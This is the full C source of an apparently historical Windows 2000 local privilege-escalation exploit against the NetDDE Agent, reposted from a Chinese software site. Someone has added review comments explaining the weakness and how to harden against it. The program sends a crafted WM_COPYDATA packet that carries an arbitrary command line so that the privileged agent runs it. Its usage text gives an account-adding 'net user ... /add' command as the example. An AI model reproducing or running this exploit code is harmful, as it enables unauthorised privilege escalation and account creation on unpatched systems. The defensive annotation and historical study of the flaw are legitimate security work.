w2k本地溢出netddemsg源码

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站

// netddemsg.cpp : Defines the entry point for the application.
// To link include library nddeapi.lib
//
// What this listing is: a historical Windows 2000 local proof-of-concept.
// It looks up the NetDDE Agent window, obtains a list of NetDDE share names
// (NDdeShareEnum, or one name from the command line) and, for each share,
// delivers a hand-built buffer (fixed 0x18-byte header + share name +
// command line) in a WM_COPYDATA message.
//
// Defender's reading: the weakness class is a process that owns a window on
// the interactive desktop and acts on window-message data without checking
// who sent it. NOTE(review): the receiving agent is not part of this
// listing; that it runs the embedded command line is taken from the original
// "Command line to execute" comment below, not from code shown here.
// Hardening that applies to this class: install the vendor fix, keep the
// NetDDE services disabled where they are not needed, and keep privileged
// code from hosting message-driven windows on the user's desktop. NetDDE was
// later removed from Windows (Vista onward), and UIPI there blocks most
// window messages sent from a lower to a higher integrity level.
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<nddeapi.h>

// Shared scratch buffer for formatted console messages (300 bytes, matching
// the size passed to every _snprintf call in this file).
// NOTE(review): MSVC's _snprintf does not write a terminating NUL when the
// output fills the buffer, so a 300-character message would be printed
// unterminated.
char mess[300];

// Prints str to stdout followed by CR LF.
void OutPutString(char *str)
{
	printf("%s\r\n",str);
}

// Translates a NetDDE API error code to text with NDdeGetErrorString and
// prints it. The exit() call is commented out, so the caller keeps running
// after an error has been reported.
void NDDEError(UINT err)
{
	char error[256];
	NDdeGetErrorString(err,error,256);
	OutPutString(error);
	// exit(err);
}

// Allocates and fills the buffer that main() sends with WM_COPYDATA.
//
// Layout written here: 0x18 header bytes copied from `magic`, then the
// NUL-terminated share name, then the NUL-terminated command line.
//
// svShareName  NUL-terminated share name placed after the header.
// svCmdLine    NUL-terminated command line placed after the share name.
// pBufLen      receives the total buffer length in bytes.
//
// Returns a malloc'd buffer that the caller must free(), or NULL (after
// printing "Out of memory.") when the allocation fails; *pBufLen is not
// written in that case.
// NOTE(review): the lengths are computed in int from size_t values, so
// there is no guard against very long inputs.
void *BuildNetDDEPacket(const char *svShareName, const char* svCmdLine, int *pBufLen)
{
	// Build NetDDE message
	int cmdlinelen=strlen(svCmdLine);
	// header + share name + NUL + command line + NUL
	int funkylen=0x18+strlen(svShareName)+1+cmdlinelen+1;
	char *funky=(char *)malloc(funkylen);
	if(funky==NULL) {
		OutPutString("Out of memory.");
		return NULL;
	}

	// 0xDDE1DDE1(magic number) 0x00000001 (?) 0x00000001 (?)
	// ShareModId unused (?)
	// The "(?)" marks are the original author's: the field meanings are
	// guesses, not documented structure. Only the first 0x18 bytes of this
	// array are copied into the packet.
	char magic[0x20]="\xE1\xDD\xE1\xDD\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x09\x00\x00\x00\x01\xCC\xCC\xCC\xCC\x0";

	memcpy(funky, magic, 0x18);
	memcpy(funky+0x18,svShareName,strlen(svShareName)+1); // Share name
	memcpy(funky+0x18+strlen(svShareName)+1,svCmdLine,cmdlinelen+1); // Command line to execute

	*pBufLen=funkylen;

	return funky;
}

// Prints the command-line syntax (file is the program name) and terminates
// the process with exit code 0; it never returns to the caller.
void Usage(char *file)
{
	_snprintf(mess, 300, "Syntax is: %s [-s sharename] <\"command line\">\r\n", file);
	OutPutString(mess);
	_snprintf(mess, 300, "\t if the command line contain BLANK, use \" \" to include it,\r\n \t for ex: %s \"net user xxx xx /add\"\r\n", file);
	OutPutString(mess);
	OutPutString("\t /? or NO parameter show this.");
	exit(0);
}

// Entry point. Parses "[-s sharename] <command line>", locates the NetDDE
// Agent window, builds the share list and sends one WM_COPYDATA per share.
// Returns 0 after the loop, or -1 on a usage error or when a packet cannot
// be allocated.
int main(int argc, char *argv[])
{
	// Check command line
	int cmdlinelen;
	if(argc<=1 || !stricmp(argv[1], "/?"))Usage(argv[0]);
	char *lpCmdLine=argv[1];
	cmdlinelen=strlen(lpCmdLine);	// assigned but not read again in main
	char *szShare=NULL;
	char *szCmdLine;
	int cmdNo=1;
	// Only the first two characters are compared, so any first argument
	// that begins with "-s" is treated as the share option.
	if(strncmp(lpCmdLine,"-s",2)==0) {
		if(argc<3) {
			OutPutString("You must specify a share after '-s'!");
			return -1;
		}
		szShare=argv[2];
		cmdNo=3;
	}
	if(argc<cmdNo+1) {
		OutPutString("You must specify a command to run.");
		return -1;
	}
	szCmdLine=argv[cmdNo];

	// Get NetDDE Window
	// The window class and title below are the two strings this program
	// depends on; when no such window exists the lookup returns NULL.
	HWND hwnd=FindWindow("NDDEAgnt","NetDDE Agent");
	if(hwnd==NULL) {
		// NOTE(review): GetLastError() returns a DWORD, which "%d" does not
		// match; "%lu" would.
		_snprintf(mess, 300, "Couldn't find NetDDE agent window, error code:%d\r\n", GetLastError());
		OutPutString(mess);
		// The early return is commented out, so execution continues with
		// hwnd == NULL.
		// return -1;
	}

	// Get computer name
	// The return value is not checked; on failure svCompName stays
	// uninitialized and dwSize may have been modified.
	DWORD dwSize=256;
	char svCompName[256];
	GetComputerName(svCompName,&dwSize);

	// Get list of shares to try
	// sharenames is a sequence of NUL-terminated names ended by an empty
	// string, which is what the loop below walks.
	char *sharename,*sharenames;
	if(szShare==NULL) {
		// Try all shares
		UINT err;
		DWORD dwNumShares;
		// First call passes no buffer to learn the required size in dwSize;
		// the second call fills the buffer.
		err=NDdeShareEnum(svCompName,0,NULL,0,&dwNumShares,&dwSize);
		if(err!=NDDE_NO_ERROR && err!=NDDE_BUF_TOO_SMALL)NDDEError(err);
		// NOTE(review): neither the malloc result nor a failed enumeration
		// stops the program (NDDEError only prints), so the loop below can
		// read a NULL or uninitialized buffer.
		sharenames=(char *)malloc(dwSize);
		err=NDdeShareEnum(svCompName,0,(LPBYTE)sharenames,dwSize,&dwNumShares,&dwSize);
		if(err!=NDDE_NO_ERROR)NDDEError(err);
	}
	else{
		// Try command line share
		// Two extra zeroed bytes give the single name the same
		// double-NUL-terminated shape as the enumerated list.
		// NOTE(review): the malloc result is not checked here either.
		sharenames=(char *)malloc(strlen(szShare)+2);
		memset(sharenames,'\0',strlen(szShare)+2);
		strcpy(sharenames,szShare);
	}

	// Try all shares
	for(sharename=sharenames;(*sharename)!='\0'; sharename+=(strlen(sharename)+1)) {
		// Tell user
		if(szShare==NULL) {
			_snprintf(mess ,300 ,"Try command through the '%s' share?",sharename);
			OutPutString(mess);
		}

		// Get NetDDE packet
		void *funky;
		int funkylen;
		funky=BuildNetDDEPacket(sharename, szCmdLine, &funkylen);
		// sharenames is not freed on this early exit.
		if(funky==NULL)return -1;

		// Perform CopyData
		// The message goes to HWND_BROADCAST (all top-level windows), not to
		// hwnd itself; hwnd is passed as wParam, the slot WM_COPYDATA uses
		// for the sending window's handle.
		COPYDATASTRUCT cds;
		cds.cbData=funkylen;
		cds.dwData=0;
		cds.lpData=(PVOID)funky;
		SendMessage(HWND_BROADCAST,WM_COPYDATA,(WPARAM)hwnd,(LPARAM)&cds);
		// With the break commented out, every share in the list is tried.
		//break;

		// Free memory
		free(funky);
	}

	// Free memory
	free(sharenames);

	return 0;
}

